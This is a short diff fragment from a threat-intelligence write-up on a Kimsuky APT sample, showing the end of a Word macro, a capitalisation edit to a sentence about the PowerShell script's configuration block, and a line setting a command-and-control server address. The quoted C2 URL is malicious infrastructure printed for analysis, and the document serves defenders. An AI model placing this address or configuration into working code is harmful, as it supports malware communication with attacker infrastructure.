StrangerealIntel/CyberThreatIntel/North Korea/APT/Kimsuky/2020-03-20/Analysis.md

  Selection.PageSetup.BottomMargin = CentimetersToPoints(2.5)
 End Sub
 ```
-<h6>The first block of the Powershell script is the values used for the configuration (persistence, URL to join, path of the files, for run payload...).</h6>
+<h6>The first block of the Powershell script is the values used for the configuration (Persistence, URL to join, path of the files, for run payload...).</h6>

 ```csharp
 $SERVER_ADDR = "http://mybobo.mygamesonline.org/flower01/"